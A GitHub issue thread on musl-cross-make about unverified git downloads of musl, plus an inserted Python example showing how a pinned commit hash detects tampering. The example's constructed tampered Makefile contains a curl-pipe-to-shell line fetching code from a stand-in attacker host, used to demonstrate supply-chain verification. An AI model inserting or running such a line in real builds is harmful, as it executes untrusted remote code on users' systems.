richfelker / musl-cross-make

Simple makefile-based build for musl cross compiler
MIT License

musl git sources are not verified #28

Open ollieparanoid opened 7 years ago

ollieparanoid commented 7 years ago

Hi there,

when downloading musl via git (which is the default), the sources get downloaded over a plain git connection without any encryption or verification.

Please switch to downloading tarballs only (where the hashes do get checked) and disable the insecure git retrieval until a HTTPS git mirror can be used.

Maybe someone can talk to the musl developers and ask for a HTTPS git mirror.

Thank you.

richfelker commented 7 years ago

While, in light of SHA-1 being broken, it's not strong against an adversary with heavy resources, use of a specific git revision (MUSL_VER = git-$sha1) is verified by "git fsck", which the top-level Makefile performs. It's only if you use (and thereby trust) a branch name or tag that it's unverified. Maybe this should be documented better.
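As an added illustration of the distinction richfelker draws above (example code written for this page, not code from musl-cross-make, musl, or anyone in this thread): git object ids are SHA-1 over `"<type> <size>\0<content>"`, and a commit id transitively covers its tree and every blob under it. Pinning `MUSL_VER=git-<sha1>` therefore fixes the exact sources you get, and `git fsck` (or, here, a Python reimplementation of the hashing) detects any object that does not hash to its claimed id. A branch name or tag is just a pointer the unauthenticated server supplies, so it pins nothing. The repository contents, author line and the "tampered" Makefile below are all constructed for the example; and, as the comment notes, this does not help against an adversary who can afford a SHA-1 collision.

```python
"""Added example, not code from musl-cross-make or musl: why MUSL_VER=git-<sha1>
is verifiable over an unauthenticated transport while a branch name is not.
Reimplements git's loose-object hashing for blobs, flat trees and commits."""
import hashlib
from typing import Dict, List, Tuple


def git_object_id(obj_type: bytes, content: bytes) -> str:
    """Hex id of a git object: sha1 over the header '<type> <size>\\0' plus the body."""
    header = obj_type + b" " + str(len(content)).encode("ascii") + b"\0"
    return hashlib.sha1(header + content).hexdigest()


def blob_id(data: bytes) -> str:
    return git_object_id(b"blob", data)


def tree_id(entries: List[Tuple[bytes, bytes, str]]) -> str:
    """entries: (mode, name, hex id). Flat trees only: git sorts entries by name
    (subdirectories sort as 'name/', which this simplified version does not handle)."""
    body = b"".join(
        mode + b" " + name + b"\0" + bytes.fromhex(oid)
        for mode, name, oid in sorted(entries, key=lambda e: e[1])
    )
    return git_object_id(b"tree", body)


def commit_id(tree: str, parents: List[str], author: bytes,
              committer: bytes, message: bytes) -> str:
    """Commit body: tree, parent lines, author, committer, blank line, message."""
    lines = [b"tree " + tree.encode("ascii")]
    lines += [b"parent " + p.encode("ascii") for p in parents]
    lines += [b"author " + author, b"committer " + committer, b"", message]
    return git_object_id(b"commit", b"\n".join(lines))


# Constructed sample repository: one file, one root commit, one branch ref.
AUTHOR = b"Example Dev <dev@example.invalid> 1500000000 +0000"  # constructed


def make_commit(makefile_src: bytes) -> str:
    """Id of a root commit whose tree holds a single 'Makefile' blob."""
    tree = tree_id([(b"100644", b"Makefile", blob_id(makefile_src))])
    return commit_id(tree, [], AUTHOR, AUTHOR, b"pin me\n")


GOOD_SRC = b"all:\n\t$(CC) -o hello hello.c\n"                           # constructed
EVIL_SRC = GOOD_SRC + b"\tcurl http://attacker.invalid/x | sh\n"          # constructed tamper

# The value a build would pin as MUSL_VER=git-$PINNED.
PINNED = make_commit(GOOD_SRC)


def verify_pinned(expected_hex: str, makefile_src: bytes) -> bool:
    """What checking out git-<sha1> buys you: recompute the id of what was actually
    fetched and compare with the pinned one. Any change to any object under the
    commit changes the commit id, which is what 'git fsck' would report."""
    return make_commit(makefile_src) == expected_hex


def resolve_branch(refs: Dict[str, str], name: str) -> str:
    """What a branch name or tag buys you: whatever the server says it points to.
    Over unauthenticated git:// an attacker on the path chooses this mapping."""
    return refs[name]


if __name__ == "__main__":
    print("pinned commit :", PINNED)
    print("good source ok:", verify_pinned(PINNED, GOOD_SRC))
    print("tampered ok   :", verify_pinned(PINNED, EVIL_SRC))
    # A mirror that silently repoints 'master' at the tampered commit.
    refs = {"master": make_commit(EVIL_SRC)}
    print("master now    :", resolve_branch(refs, "master"))
```

Running it shows the tampered Makefile failing verification against the pinned id, while `resolve_branch` happily returns the attacker's commit for `master`; the only defence against that is to pin the hash yourself, exactly as the comment above describes.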

ollieparanoid commented 7 years ago

You are right, I did not notice the git fsck call and the implicit checkout of a specific branch - thank you for explaining.